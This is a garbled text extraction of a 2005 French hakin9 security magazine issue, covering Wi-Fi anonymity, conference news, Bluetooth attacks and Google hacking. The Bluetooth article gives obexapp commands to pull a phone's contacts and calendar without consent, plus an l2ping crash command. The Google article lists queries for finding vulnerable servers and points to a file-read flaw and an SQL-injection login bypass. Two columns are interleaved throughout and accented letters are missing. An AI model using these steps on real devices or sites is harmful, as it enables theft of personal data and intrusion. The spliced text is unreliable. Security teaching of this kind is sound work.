Professional Documents
Culture Documents
Monika Godlewska
e-mail : monikag@software.com.pl
Science
Software-Wydawnictwo Sp. z o.o.,
Lewartowskiego 6, 00-190 Varsovie, Pologne
Tl. +48 22 860 18 81, Fax. +48 22 860 17 70
www.hakin9.org
Fiche technique
Campana, Gilles Gaffet, Sebastien Lecocq, Pierre-Emmanuel Leriche,
Gilles Fournil, Pierre Mennechet, Jeremy Canale
Tomasz Nidecki
Essaie de mattraper
U
ne chaude soire dt. Le propritaire du cyber serveurs diffrents pour arriver jusqu la victime tout
caf du quartier, coll lcran de son ordina- en masquant lorigine deffraction, est dfinitivement
teur, joue Half-Life. Un jeune homme, habill termine. Les cybers cafs ont permis aux malfrats un
trs chic, entre dans le caf. Il porte les lunettes Gucci vrai anonymat. Cependant, ces cafs ntaient pas pour
et une chemise soigneusement repasse. Le jeune eux trs pratiques. Le pirate tait contraint dutiliser un
homme affiche un large sourire. Il paye au comptoir une ordinateur et le payer. prsent, les cybers pirates
heure de connexion Internet. La serveuse, jeune amie peuvent exprimer leur infinie gratitude ceux qui ont
du propritaire, est moiti endormie et ne fait pas sp- invent des hot spots gratuits. Maintenant, il leur suffit
cialement attention au jeune homme. Elle est fascine dquiper le micro portable en carte Wi-Fi et sasseoir
par les articles de la presse people quelle est en train sur un banc pour pouvoir capter tout le rseau. Et com-
de feuilleter. ment identifier ces individus ? Daprs une adresse
Le jeune homme prend place dans un coin et branche MAC ? Vous voulez rire ! Dans ce cas prcis, ils restent
sa cl USB lordinateur. Dun air impassible, lhomme totalement impunis !
narrte pas de pianoter sur le clavier. Les habitus du Les hots spots deviennent de plus en plus populaires.
caf ne font pas attention lui non plus, car ceux-l Les commerant y recourent de plus en plus pour attirer
sont captivs par les jeux en ligne et par la drague via le les clients. Mme un petit restaurant dans mon quartier
chat. Le jeune homme quitte le caf avant que lheure ne affiche une pancarte publicitaire qui allche la clientle
scoule, tout en souriant gentiment. La serveuse mur- avec une entre libre sur l'Internet. Je suis cependant
mure peine un au revoir. persuad que ce restaurateur na pas rflchi ce quil
Quelques jours plus tard, le caf est encercl par des puisse advenir, si lun de ses clients cambriolait une
hommes cagouls. Le propritaire est sous le choc. Lui banque partir du rseau install dans son commerce.
et son amie sont menotts et embarqus dans un camion Il a d penser que les voleurs iront plutt chez le voisin.
de police. On apprend que quelques jours auparavant, Mme sans les hots spots, la technique Wi-Fi est trs
les archives de la DST ont t visites et les malfaiteurs peu scurise. Chaque rseau sans fil est une vraie pas-
ont drob des donnes ultra confidentielles. Linfrac- soire. Beaucoup dhabitants dimmeubles optent pour le
tion a t commise partir de ladresse IP attribue au rseau Wi-Fi, lequel leur permet de contourner les autori-
propritaire du cyber caf. Le propritaire tente en vain sations des syndics pour faire passer le cble dun balcon
dexpliquer quil ne peut pas rpondre des actes de ses lautre, ou installer ce cble via le rseau tlphonique.
clients. Il fallait demander aux clients des pices diden- La technique Wi-Fi est adopte par les entreprises les-
tit et noter leurs numros rtorque le procureur. quelles ne veulent pas investir dans une infrastructure
Cette histoire nest pas relle mais elle peut bientt cble. Violer laccs dun rseau Wi-Fi est non seule-
le devenir. L encore, il ny aura pas de justifications ment beaucoup plus simple que de faire une effraction
possibles. La victime pourrait tre non seulement un pro- dans un rseau cbl, mais de plus, cette technique
pritaire dun cyber caf mais aussi bien le propritaire empche de trouver l'auteur du crime. Car comment
dune entreprise qui na aucun rapport avec lInternet tablir quel individu tel jour et telle erreur se trouvait
par exemple, un restaurateur qui aurait mis en place un proximit du rseau (pas forcment dans les locaux de
hot spot pour ses clients, ou bien encore ladministrateur lentreprise ou dans l'immeuble mais par exemple dans la
dun rseau local qui fonctionnerait avec un systme Wi- cour) avec un ordinateur.
Fi. Une fois de plus, les justifications, en cas deffraction, Je suis peut-tre un rleur nostalgique, cependant,
ne serviront rien. Qui va chercher le vrai coupable def- je regrette le bon vieux temps. Je prfre avoir moins
fraction ? Les preuves seront solides et ladresse IP sera de facilit pour me connecter lInternet mais en revan-
suffisamment parlante. che, tre certain de pouvoir identifier un pirate potentiel
Passer inaperu est un jeu denfant pour un cam- et le prendre sur le fait. Alors, pour protester contre cette
brioleur qui pntre dans un rseau. Lpoque o le menace, je reste fidle au rseau BNC. Cela me permet
malfrat devait tablir une connexion travers cinq de dormir tranquillement. n
S
ur le CD joint la revue, vous trouverez C'est fluxbox, avec le gestionnaire ROX et le moniteur
hakin9.live (h9l) en version 2.5.2 distribution systme Torsmo qui est actuellement l'environnement
Linux bootable intgrant les outils ncessaires, graphique par dfaut. Un tel ensemble se prsente bien,
la documentation, les tutoriaux et les matriaux compl- il est hautement configurable et ses exigences matriel-
mentaires aux articles. les ne sont pas leves. En mme temps, il est possible
Pour commencer utiliser hakin9.live, il suffit de de dmarrer Xfce 4 en version 4.2.1.1 (option de dmar-
dmarrer l'ordinateur avec le CD insr dans le lecteur. rage hakin9 xfce4).
Les options supplmentaires concernant le dmarrage
du disque (le choix de la langue, une autre rsolution, Tutoriaux et documentation
la dsactivation du framebuffer, etc.) ont t dcrites dans La documentation contient, hormis les astuces concer-
la documentation disponible sur le CD c'est le fichier nant le dmarrage et la gestion de hakin9.live, les tuto-
help.html (si vous voulez le lire partir du h9l dmarr, riels prpars par la rdaction comprenant les exercices
le fichier se trouve dans /home/haking/help.html). pratiques. En ce qui concerne les tutoriels, nous prsup-
posons que vous utilisez hakin9.live. Ainsi, vous vitez les
Quoi de neuf ? problmes lis aux diffrentes versions des compilateurs,
La version 2.5.2 h9l est base sur Aurox Live 10.2. un autre emplacement des fichiers de configuration ou
Le systme tourne sous la surveillance du noyau 2.6.9. aux options indispensables pour dmarrer un logiciel
La dtection du matriel a t corrige et la configuration donn dans un environnement choisi.
du rseau amliore. Le menu est galement standar- La version actuelle de hakin9.live, outre les tutoriaux
dis tous les logiciels ont t regroups dans les cat- des ditions prcdentes, en intgre deux nouveaux. Le
gories adquates, ce qui offre l'accs aux applications premier montre comment communiquer en utilisant la
donnes beaucoup plus intuitif. La nouvelle hakin9.live stganographie rseau (et les en-ttes TCP/IP).
intgre plusieurs nouveaux matriaux supplmentaires Le second concerne la rcupration scure des don-
les documents RFC mis jour, quelques livres gratuits nes partir des systmes de fichiers dans Linux. Ce
au format PDF et HTML et les articles non publis. Le hit doument dcrit la mise en pratique du savoir-faire com-
de ce numro est une publication intitule An Introduction pris dans l'article Rcupration des donnes partir des
to Security (auteur collectif) au format PDF et TXT. systmes de fichiers Linux. n
Figure 1. hakin9.live vous offre plusieurs outils Figure 2. Plusieurs nouveaux matriaux
disponibles sur un CD supplmentaires
21 mois de prison
Webroot, la production des pro-
grammes de type spyware devient
une affaire en or : les bnfices
g de 21 ans, Raymond Paul Stei- Le ver permettait de prendre annuels de cette branche atteignent
gerwalt, le pirate amricain, accus le contrle des systmes infects 2 milliards de dollars. Le document
d'avoir infect le Dpartement de la travers les canaux IRC. Il permet- publi contient aussi une thse
Dfense des tats Unis (Department tait d'excuter plusieurs processus audacieuse que ce procd peut
mme faire obtenir 25 % de march
of Defense) par le ver TK worm, a t dangereux au niveau de la machine
de la publicit dans l'Internet.
puni d'une peine de 21 mois dincar- infecte partir du scannage Les programmes affichant de la
cration. S'y ajoute un ddommage- des autres machines pour dtec- publicit ou redirigant les navi-
ment de 12 000 dollars au profit du ter les failles dans les systmes gateurs vers des adresses non
Dpartement de la Dfense. Il parat de protection jusqu'aux attaques souhaites constituent, d'aprs les
que Steigerwalt est devenu un bouc DDoS contre d'autres ordinateurs tudes, plus de la moiti de toutes
les infections. Bien que la cons-
missaire et tait puni pour tous les et rseaux. En 2002 en Grande
cience des utilisateurs augmente,
auteurs du ver. Bretagne, TK worm a entran les les infections sont de plus en plus
TK worm a t identifi pour la pre- pertes financires de plus de 5,5 frquentes.
mire fois dans la 1re moiti de 2002. millions livres. Les statistiques sont effrayantes
Il exploitait les failles dans le serveur Steigerwalt a t aussi con- depuis janvier jusqu' avril 2005,
Microsoft Internet Information Services damn pour la dtention d'images de environ 90% des machines dans
les entreprises et dans les mai-
pour se diffuser et installer les portes pornographie infantile. Entre 2002
sons ont t infectes. Bien que le
drobes contrles par les concep- et 2003, il tait membre du groupe nombre de nouveaux programmes
teurs du ver. Au moins deux ordina- Thr34t Krew (TK), souponn d'avoir malicieux dtects baisse, les
teurs appartenant au Dpartement de cr le ver TK worm. rgulations lgales incriminant ce
la Dfense ont t contamins. procd n'existent pas. Mme les
tats Unis n'ont pas russi l'anne
pass introduire les rglements
Microsoft : appropris.
D
u 29 mars au 1 avril 2005 Amsterdam, l'dition aussi mentionner la confrence de Job de Haas, consa-
europenne de l'une des plus importantes con- cre la scurit du systme Symbian, conu pour les
frences ddies la scurit IT Black Hat priphriques mobiles. Le cours d'Aleksander Kornbrust
Europe (http://www.blackhat.com) a eu lieu. Pendant concernant les rootkits de bases de donnes tait aussi
quatre jours, plus de quarante confrences et ateliers, une surprise trs agrable.
d'ailleurs trs bien organiss, ont eu lieu. Les prsenta- Hlas, rien n'est parfait et nous avons connu deux
teurs, meilleurs spcialistes des quatre coins du monde, dceptions. La premire tait le cours de Kenneth Geers
ont surpris les participants par leur savoir-faire et par leur sur la scurit rseau en Russie les informations taient
dmonstration. Le partenaire mdiatique de cette ren- assez banales et on pouvait remarquer une certaine fas-
contre de printemps tait le magazine hakin9. cination de l'auteur sur la vision informatique russe. Le
Les ateliers (appels par Black Hat Trainings) taient deuxime chec, un peu plus lger, tait la confrence
des prsentations pratiques trs bien prpares tout de Jon Callas du PGP Corporation intitul Hacking PGP,
comme les cours (Briefings), trs apprcis par lquipe qui pouvait tre traite comme une crypto-publicit de
de hakin9. Ces derniers, diviss en deux catgories l'entreprise (un long discours qui s'est termin par la con-
simultans, placs les participants devant un dilemme : clusion que le PGP est pratiquement inviolable).
que choisir. Les enregistrements audio et vido et les matriaux
Il est difficile d'numrer ici tous les vnements de la confrence sont tlcharger partir du site Web
importants, mais notre quipe a t impressionne par le de Black Hat. Mais la participation personnelle la con-
cours de Dan Kaminsky, traitant du transfert des donnes frence a fourni des impressions inoubliables. Malgr le
et de l'omission des pare-feux l'aide du protocole DNS. prix trs lev plus de 1000 dollars pour deux jours de
Dan a dmontr comment, dans les requtes DNS, on confrence la participation ce type d'vnement est
peut transfrer des informations quelconques partir ncessaire pour tous ceux qui veulent tre au courant
de chanes de caractres trs simples jusqu'aux donnes des derniers problmes lis la scurit IT. Mais rien
audio et vido. La transmission en ligne voice over DNS nest fini bien que la confrence amricaine ait dj eu
a t accueillie par de vifs applaudissements. lieu, la confrence Black Hat Asia au Japon sera tenue
La confrence de l'quipe d'Adam Laurie, le spcia- en octobre 2005.
liste le plus connu sur la scurit du protocole Bluetooth, Roman Polesek
Figure 1. Les formations furent d'un grand intrt Figure 2. L'quipe de hakin9 : Tomasz Nidecki, Roman
Polesek
D
e plus en plus de priphriques virus fonctionnant sur ces priphriques de
communiquent travers Bluetooth leur faon de se propager, du fonctionnement
(cf. l'Encadr Bluetooth bondissant). et des mthodes permettant de les liminer.
Ce protocole peut tre utilis, par exemple,
pour connecter un ordinateur portable Inter- Ainsi parlait la spcification
net l'aide d'un tlphone mobile, pour se ser- La spcification du Bluetooth dtermine trois
vir d'un casque d'coute sans fil, il permet aussi nivaux de protection implmenter dans les
de construire les rseaux dans les bureaux. priphriques :
Ses domaines d'application sont pratiquement
illimits. niveau 1 sans protection,
Pourtant, ce protocole n'est pas trs sr, niveau 2 la protection au niveau des servi-
et une multitude d'applications deviennent ces,
dangereuses pour l'utilisateur. Il existe dj de
nouveaux virus diffuss via Bluetooth. Derni-
rement, le virus Cabir a sem le trouble, mais Cet article explique...
il n'est pas le seul il existe encore Dust, le virus
comment dtecter les priphriques dots du
contaminant les priphriques de type PDA,
Bluetooth,
et Lasco, trs similaire Cabir, mais beaucoup comment cibler une attaque contre ces pri-
Dossier
l'adresse du priphrique de
48 bits, l'adresse unique du pri-
Bluetooth bondissant
Bluetooth fonctionne sur la bande de frquence de 2,4 GHz, et plus prcisment phrique concret dtermine par
dans la gamme de 24022480 MHz. La bande est divise en 79 canaux d'une lar- IEEE (Institute of Electrical and
geur de 1 MHz, entre lesquelles sautent les priphriques communiquants. Si ces Electronic Engineers),
priphriques sont synchroniss, un seul canal logique permettant d'envoyer les la cl de chiffrage prive la cl
donnes est cr. utilise pour le chiffrage des don-
Pour un observateur extrieur, les donnes sont tout simplement une srie nes, d'une longueur de 8128
d'impulsions se produisant sur diffrentes frquences, apparemment alatoires. bits (en fonction du pays du fabri-
Les priphriques changent les frquences (canaux) conformment un certain cant),
algorithme. Cet algorithme est diffrent pour chaque connexion tablie dans une
la cl d'authentification prive
zone donne.
cette cl est utilise pour
La premire phase de l'tablissement d'une connexion entre les priphri-
authentifier l'utilisateur, d'une lon-
ques est l'ajustage du client l'algorithme des sauts du serveurs et la phase
dtermine de cet algorithme partir de ce moment, les deux priphriques gueur de 8128 bits (en fonction
sautent ensemble. Ce n'est pas facile, vu que les sauts de frquences s'effec- du pays du fabricant),
tuent 1600 fois par seconde. Pour pouvoir couter la communication entre deux nombre alatoire RAND le
priphriques Bluetooth, il faut couter la squence initialisant la connexion, au nombre pseudo-alatoire, de 128
moment o l'un des priphriques propage les donnes concernant son algo- bits, gnr de temps en temps
rithme de sauts. par le priphrique,
Si dans une zone, plusieurs priphriques fonctionnent, il est probable qu' les algorithmes de la gnra-
un moment plus d'une paire communique travers un canal. Mais ce n'est pas un tion des cls E0, E21 et E22
problme. Le protocole de la transmission des donnes au niveau de la couche de
(cf. l'Encadr Bluetooth et algo-
liaison de donnes assure dans cette situation une solution correcte la transmis-
rithmes E).
sion du paquet erron est rpte sur le premier canal libre.
La porte de la communication Bluetooth est de moins de 10 jusqu'au plus de
100 mtres (en fonction de la puissance de l'metteur et du rcepteur). La plupart Comme nous l'avions dit, le
des priphriques sont munis d'une antenne de faible puissance le cot d'un tel deuxime niveau de protection est
priphrique est moins lev, la consommation d'nergie est galement plus faible ralis par le chiffrage des donnes
(ce qui est important, tant donn que ces priphriques sont aliments avec des envoyes. Pour cela, on utilise la
batteries). Cela signifie qu'un coutant devra se trouver une distance de quelques cl de chiffrage d'une longueur de
mtres. Pourtant, malgr les apparences, ce n'est pas une difficult il y a plusieurs 8128 bits, gnre l'aide de l'al-
endroits o l'on peut effectuer une attaque sans tre vu, tout en se trouvant trs gorithme E0. Cette taille dpend de
prs du priphrique attaqu. L'exemple le plus banal est le hall d'arrives d'un plusieurs facteurs entre autres, de
aroport.
la puissance de calcul du priphri-
que concern et de la lgislation du
pays d'origine. tant donn que dans
niveau 3 la protection au niveau entrantes ne sont effectues sans la communication peuvent participer
de la connexion rseau. parler du chiffrage des donnes des priphriques utilisant des cls
envoyes. Ce chiffrage est parfois de longueurs diffrentes, lors de
La plupart des priphriques sont effectu au niveau de l'application l'tablissement de la connexion chif-
configurs par dfaut de faon (2me niveau de protection). fre, elles ngocient la longueur de
fonctionner sans protection. Aucu- Mais Bluetooth permet d'effectuer la cl commune.
ne authentification (vrification de l'authentification et l'autorisation au ni- Le troisime niveau est ralis
l'identit) ni autorisation (dfinition veau de la connexion rseau il suffit travers la phase d'authentification
des droits d'accs) des connexions de configurer le priphrique de faon et d'autorisation. Son composant le
ce que celui-ci demande l'authenti- plus important est la cl de liaison.
fication, l'autorisation et le chiffrage Cette cl est utilise toujours quand
propos de l'auteur pour les connexions entrantes et en- il faut protger une connexion r-
Tomasz Rybicki est membre
voie lui-mme ces informations lors seau indpendamment du nombre
du MEAG (Mobile and Embed-
de l'initialisation d'une connexion. de priphriques participant la
ded Applications Group http://
Dans chaque priphrique utili- communication. La cl de liaison est
meag.tele.pw.edu.pl), l'quipe agis-
sant au sein de l'Institut de Tlcom- sant la technologie Bluetooth, cinq un nombre pseudo-alatoire, d'une
munication de l'cole Polytechnique lments assurant la scurit des longueur de 128 bits. Elle peut tre
de Varsovie. Il s'occupe des applica- connexions sont disponibles. Ces temporaire valide jusqu' la fin de
tions mobiles fonctionnant en tech- lments sont utiliss pour la gn- la session courante, ou permanente
nologie J2ME. Contact de l'auteur : ration des cls et l'implmentation du aprs la terminaison de la ses-
trybicki@autograf.pl. chiffrage au deuxime et troisime sion, elle peut tre exploite pour
niveau de protection : des authentifications ultrieures
Figure 1. Les phases successives de l'tablissement d'une connexion entre deux priphriques Bluetooth
Dtecter l'indtectable
Pour tablir une connexion rseau
l'aide du Bluetooth, l'adresse (URL)
du priphrique cible est ncessaire.
Pour obtenir les adresses de tous les
priphriques qui se trouvent proxi-
mit, il faut effectuer la recherche.
Cette opration consiste envoyer par
le priphrique un message appropri
Figure 2. La recherche des adresses des priphriques Bluetooth l'adresse broadcast. Les priphri-
ques fonctionnant en mode dtecta-
il n'est pas ncessaire d'effectuer Dissimulation ble coutent ces types de messages
les cycles de calculs. Une autre mthode d'attaque est et y ragissent par l'envoi d'un court
Un avantage supplmentaire l'utilisation de la cl du priphrique. message contenant, entre autres,
de cette attaque est la possibilit Envisageons le scnario suivant leurs adresses. Les priphriques qui
d'ajouter aux informations poss- les priphriques A et B commu- sont en mode indtectable ngligent
des, les donnes sur la cl de niquent entre eux l'aide de la cl ces messages et leurs adresses ne
chiffrage. Pour la gnrer, on uti- du priphrique A. Aprs un certain sont pas rendues publiques.
lise la cl de liaison actuelle LK, temps, le priphrique A se connec- Ce processus est prsent sur la
et le nombre pseudo-alatoire est te avec le priphrique C, en utili- Figure 2. Le priphrique A recher-
envoy (de nouveau) entre les p- sant aussi la cl du priphrique A. che les priphriques se trouvant
riphriques de faon non chiffre. Le priphrique B, possdant la proximit ; la couleur bleu signifie
Si vous connaissez la cl de liaison cl du priphrique A, peut sans que le priphrique trouv est en
(attaque sur E22) et le nombre problme couter la transmission, mode dtectable, rouge en mode
pseudo-alatoire, il est facile de ou mme se faire passer pour le indtectable. Comme vous voyez,
calculer la cl de chiffrage. priphrique C. tous les priphriques reoivent le
En pratique, une telle attaque message de requte (en anglais
Attaque sur le PIN (en ligne) peut tre effectue l'aide d'un inquiry), mais seuls les priphri-
Dans certaines situations, il est pos- ordinateur portable dot de la carte ques en mode dtectable rpon-
sible de se procurer le numro PIN Bluetooth. Lors de l'tablissement dent (c'est--dire les priphriques
en ligne. Certains priphriques pos- de la connexion, les deux priphri- B et C). Le priphrique D nglige le
sde un code PIN fixe contre les ques participant la communication message de requte.
attaques, il est protg seulement ngocient la cl de liaison qui sera On peut avoir l'impression qu'il est
par le temps exponentiel entre les utilise. En modifiant la structure de impossible d'tablir une connexion
tentatives d'authentification succes- la pile des protocoles, il est possible entre les priphriques fonctionnant
sives. Ce type de protection peut d'imposer que le priphrique atta- en mode indtectable. Mais ce n'est
tre facilement contourn il suffit, quant (ordinateur portable) demande pas vrai. Le priphrique en mode
Dossier
aprs chaque tentative d'authentifi- chaque fois l'utilisation de la cl du indtectable nglige les messages de
cation non russie (et le code PIN priphrique attaqu. Ainsi, l'as- requte, mais rpond aux messages
incorrect), de changer l'adresse du saillant (priphrique B) est capable adresss directement lui.
priphrique. Dans le cas d'un tl- de prendre connaissance de la cl Mais comment l'assaillant peut
phone ou PDA, cette opration sera du priphrique attaqu (priphri- connatre l'adresse d'un priphrique
plutt difficile, mais un ordinateur que A). d'une longueur de 48 bits ? Il peut,
portable muni d'une carte Bluetooth Une fois la connexion termine, par exemple, la gnrer. Et il n'a
offre de grandes possibilits de s'in- le priphrique B effectue l'coute pas besoin de 248 -1 combinaisons,
troduire dans la pile Bluetooth. au moment o il enregistre l'adresse comme on pourrait supposer.
employer ce priphrique : ini- vers le port sur lequel le modem coute. Dans Windows, vous pouvez les envoyer soit
tialiser les connexions sonores ou travers l'HyperTerminal, soit l'aide de l'onglet Diagnostic (Diagnostics) dans les
proprits du modem dans le panneau de configuration.
envoyer des messages SMS. Ce
Les exemples des commandes AT :
type d'attaque est plus puissant
que cela pourrait paratre les ATA indique au modem qu'il doit rpondre l'appel,
pertes des donnes ou les pertes ATDn indique au modem de composer le numro n,
financires (p. ex. l'initialisation des ATLn volume du haut-parleur interne du modem (n=0 volume faible, n=3 volume
connexions avec les numros de ty- lev).
pe premium) ne sont que le prlude
l'intermdiaire de BlueBug se trouve hccontrol sert, entre autres, Dans la dernire tape, vous saisis-
l'adresse http://www.saftware.de/ dtecter les priphriques se sez le nom sous lequel vous voulez
bluetooth/btxml.c. Le programme trouvant dans le voisinage, enregistrer le fichier :
tourne sous Linux et utilise son im- l2control affiche la liste des
plmentation de la pile Bluetooth, connexions tablies, get: local file > nom_du_fichier
BlueZ. Cette application permet, l2ping fonctionne de faon ana-
entre autres, de copier le carnet logue au programme ping. Une fois le tlchargement termin,
d'adresses partir d'un priphrique le message suivant s'affiche :
distant, et cela sans aucune authen- Ces utilitaires permettent de col-
tification. Bluesnarfer, disponible lecter les informations sur les Success, response:
l'adresse http://www.alighieri.org/ priphriques dots de Bluetooth OK, Success (0x20)
tools/bluesnarfer.tar.gz fonctionne qui se trouvent proximit. Mais
de faon similaire. pour attaquer un tlphone, nous Ainsi, vous avez accs tous les
nous servirons d'un autre outil fichiers du priphrique. Les plus
Bluejacking obexapp, disponible l'adresse intressants sont :
L'une des couches de la pile de http://www.geocities.com /m_ev-
protocoles Bluetooth est la couche menkin. Cet outil sera utilis pour telecom/pb.vcf, contenant le car-
OBEX (cf. l'Encadr Bluetooth sur charger des fichiers partir d'un net d'adresses,
la pile), prsente aussi dans les tlphone, l'insu et sans accord telecom/pb/luid/*.vcf les fi-
tlphones possdant l'interface du propritaire. chiers de cartes de visites enre-
IrDA. OBEX permet d'envoyer des Dans la premire tape, il faut gistrs dans le priphrique,
paquets anonymement (c'est--dire initialiser la connexion OBEX (cf. telecom/cal.vcs, contenant
sans authentification), sans devoir l'Encadr Bluetooth sur la pile) en l'agenda et le gestionnaire de
tablir une connexion (l'change de tapant la commande : tches.
cl) entre les priphriques. L'cran
du priphrique attaqu affiche une # obexapp -a BD_ADDR -f-C 10 Les noms de tous les fichiers que
inscription de type : l'on peut tlcharger sont disponibles
BD _ ADDR est l'adresse du priphri- sur les pages man de la commande
'You have been bluejacked' que avec lequel vous voulez vous obexapp. Pour pouvoir accder aux
received by Bluetooth connecter (pour le connatre, vous donnes dsires, il suffit d'ouvrir
pouvez utiliser le programme men- le fichier tlcharg dans un diteur
C'est un message informant qu'on tionn hccontrol). Le drapeau -f quelconque.
a obtenu l'objet appel You have indique au priphrique que l'on veut
been bluejacked. Cet objet peut tre se connecter au service de consulta- Attaque Denial of Service
une carte de visite ordinaire l'envoi tion des dossiers. Par contre l'option Certaines implmentations de la
des cartes de visite est une fonc- -C 10 dfinit que l'on veut se connec- pile Bluetooth sont vulnrables aux
tion standard offerte par plusieurs ter au service OBEX PUSH, permet- attaques de type DoS (Denial of
priphriques. l'adresse http:// tant d'envoyer et de tlcharger les Service). Cette attaque consiste
www.mulliner.org/palm/bluespam. fichiers partir du priphrique. envoyer un paquet modifi au
php, vous trouverez un programme Ainsi, vous avez accs la ligne priphrique. Ce paquet entrane le
(pour le systme PalmOS) permet- de commandes de la connexion plantage du fonctionnement de la
tant de dtecter et d'attaquer de la OBEX : pile Bluetooth.
sorte les priphriques proximit. En quoi consiste la modification
Heureusement, Bluejacking n'est pas obex> du paquet ? Chose trange, il chan-
dangereux pour les donnes stoc- ge uniquement la taille du paquet
kes dans le priphrique. Ensuite, vous commencez la ses- en suprieure 65536 octets. Ces
Certaines implmentations sion de tlchargement des fichiers attaques peuvent tre effectues
d'OBEX permettent aussi d'inter- partir du tlphone : l'aide des outils standards du pa-
cepter des fichiers de manire non quet Linux BlueZ il suffit de taper la
autorise. vrai dire, il n'est pas trop obex>get commande :
difficile d'effectuer ce type d'attaque.
Pour s'attaquer au Ericsson T610, on et vous entrez le nom du fichier t- $ l2ping s <taille_du_paquet>
utilisera FreeBSD. Aprs l'installation lcharger :
d'une carte approprie et l'initialisa- La faille permettant d'effectuer une
tion (en noyau ou en module) de la get: remote file telle attaque rsulte des erreurs
pile Bluetooth, FreeBSD donne accs (empty for default vCard)> dans l'implmentation de la pile
quelques outils trs intressants : nom_du_fichier Bluetooth et c'est pourquoi, elle
G
oogle rpond environ 80 pourcent
de toutes les questions poses et par Cet article explique...
consquent, c'est le moteur de recher-
che le plus utilis. Cela est d non seulement comment rechercher des informations confiden-
son mcanisme de gnration de rsultats tielles en utilisant Google,
comment trouver des informations sur des sys-
trs efficace mais aussi de grandes possi-
tmes et des services rseaux vulnrables aux
bilits au niveau des questions poses. Il ne
attaques,
faut pas pourtant oublier qu'Internet est un
comment trouver dans Google des priphri-
mdia trs dynamique et que les rsultats de ques rseaux disponibles au grand public.
recherche prsents par Google ne sont pas
toujours d'actualits. Il arrive que certaines pa-
Ce qu'il faut savoir...
ges trouves soient vieilles et que plusieurs pa-
ges ayant un contenu similaire n'aient pas t savoir utiliser un navigateur Web,
visites par Googlebot (script ayant pour but de avoir un savoir-faire de base sur le protocole
rechercher et d'indexer les ressources Web). HTTP.
Les oprateurs de prcision les plus impor-
tants et les plus utiles, y compris leur descrip-
tion et le rsultat de leur fonctionnement, sont
prsents dans le Tableau 1. Les endroits des propos de l'auteur
Focus
site limite les rsultats aux pages se site:google.com fox trouvera toutes les pages conte-
trouvant dans un domaine dfini nant le mot fox dans leur texte et se trouvant dans le
domaine *.google.com
intitle limite les rsultats aux documents intitle:fox fire trouvera les pages contenant le mot
contenant une phrase donne dans fox dans le titre et fire dans le texte
le titre
limite les rsultats aux documents allintitle:fox fire trouvera toutes les pages contenant
allintitle contenant toutes les phrases don- les mots fox et fire dans le titre ; son fonctionnement
nes dans le titre est similaire celui de intitle:fox intitle:fire
inurl limite les rsultats aux pages inurl:fox fire trouvera les pages contenant les mot fire
contenant une phrase donne dans dans le texte et fox dans l'adresse URL
l'adresse URL
allinurl limite les rsultats aux pages con- allinurl:fox fire trouvera les pages contenant les mots
tenant toutes les phrases donnes fox et fire dans l'adresse URL ; son fonctionnement est
dans l'adresse URL similaire celui de inurl:fox inurl:fire
filetype, ext limite les rsultats un type de retournera les documents PDF
filetype:pdf fire
document donne contenant le mot fire et filetype:xls fox retournera les
documents Excel contenant le mot fox
numrange limite les rsultats aux documents numrange:1-100 fireretournera les pages comprises
contenant dans leur texte le nombre entre 1 et 100 contenant le mot fire. Le mme rsultat
d'une page dfinie peut tre obtenu en posant la question : 1..100 fire
link limite les rsultats aux pages link:www.google.fr retournera les documents conte-
contenant des liens vers une page nant au moins un lien vers la page www.google.fr
donne
limite les rsultats aux pages avec inanchor:fire retournera les documents contenant les
inanchor
un lien contenant dans sa descrip- liens possdant le mot fire dans sa description (non
tion une phrase donne dans l'adresse URL vers laquelle ils conduisent mais
dans la partie souligne du texte reprsentant le lien)
allintext
limite les rsultats aux documents allintext:"fire fox" retournerales documents conte-
contenant dans le texte une phrase nant la phrase fire fox seulement dans le texte
donne sans se soucier du titre, des
liens et des adresses URL
""
permet de rechercher toutes les "fire fox" retournera les documents contenant la
phrases et pas seulement que les phrase fire fox
mots
. est remplac par un caractre fire.fox retournera les documents contenant les phra-
unique ses fire fox, fireAfox, fire1fox, fire-fox etc.
* est remplac par un mot unique fire * fox retournera les documents contenant les phra-
ses fire the fox, fire in fox, fire or fox etc.
OR logique "fire fox" | firefox retournera les documents contenant
|
la phrase fire fox ou le mot firefox
seulement de trouver des ressour- nment utilis. Admettons qu'il ple deux logiciels assez populaires :
ces Internet visant plutt le grand concerne le serveur Microsoft IIS WebJeff Filemanager et Advanced
public mais aussi des ressources en version 5.0 et que l'objectif d'un Guestbook.
dites confidentielles et donc prives. agresseur potentiel soit de trouver Le premier d'entre eux est un
Si vous posez une question appro- quelques machines quipes de ce gestionnaire de fichiers Web per-
prie, il se peut que vous receviez de logiciel afin de les attaquer. Bien sr, mettant d'envoyer des fichiers sur
surprenants rsultats. Commenons il pourrait utiliser cette fin un scan- des serveurs. De plus, grce ce
par quelque chose de simple. ner mais il prfre choisir Google logiciel, il est possible de crer,
Question Serveur
"Apache/1.3.28 Server at" intitle:index.of Apache 1.3.28
"Apache/2.0 Server at" intitle:index.of Apache 2.0
"Apache/* Server at" intitle:index.of n'importe quelle version d'Apache
"Microsoft-IIS/4.0 Server at" intitle:index.of Microsoft Internet Information Services 4.0
"Microsoft-IIS/5.0 Server at" intitle:index.of Microsoft Internet Information Services 5.0
"Microsoft-IIS/6.0 Server at" intitle:index.of Microsoft Internet Information Services 6.0
"Microsoft-IIS/* Server at" intitle:index.of n'importe quelle version de Microsoft Internet Informa-
tion Services
"Oracle HTTP Server/* Server at" intitle:index.of n'importe quelle version de serveur Oracle
"IBM _ HTTP _ Server/* * Server at" intitle:index.of n'importe quelle version de serveur IBM
"Netscape/* Server at" intitle:index.of n'importe quelle version de serveur Netscape
"Red Hat Secure/*" intitle:index.of n'importe quelle version de serveur Red Hat Secure
"HP Apache-based Web Server/*" intitle:index.of n'importe quelle version de serveur HP
Tableau 3. Questions sur les pages standard aprs l'installation des serveurs Web
Question Serveur
intitle:"Test Page for Apache Installation" "You are Apache 1.2.6
free"
de consulter, de supprimer et /etc/passwd (voir la Figure 3). Bien la possibilit d'insrer le code SQL
mme de modifier tous fichiers sr, pour trouver les serveurs vuln- voir l'article Attaques par injection
prsents sur le serveur concern. rables, l'agresseur utilisera Google SQL avec PHP et MySQL dans ha-
Malheureusement, WebJeff Filema- en posant la question : "WebJeff-Fi- kin9 n 3/2005) d'obtenir l'accs au
nager en version 1.6 a une erreur lemanager 1.6" Login. panneau de configuration. Il suffit
permettant de lire le contenu de La deuxime application Ad- de trouver la page d'ouverture de
n'importe quel fichier se trouvant vanced Guestbook est un logiciel session au panneau (voir la Figure 4)
sur le serveur auquel peut accder crit en PHP utilisant la base de et d'ouvrir la session en laissant le
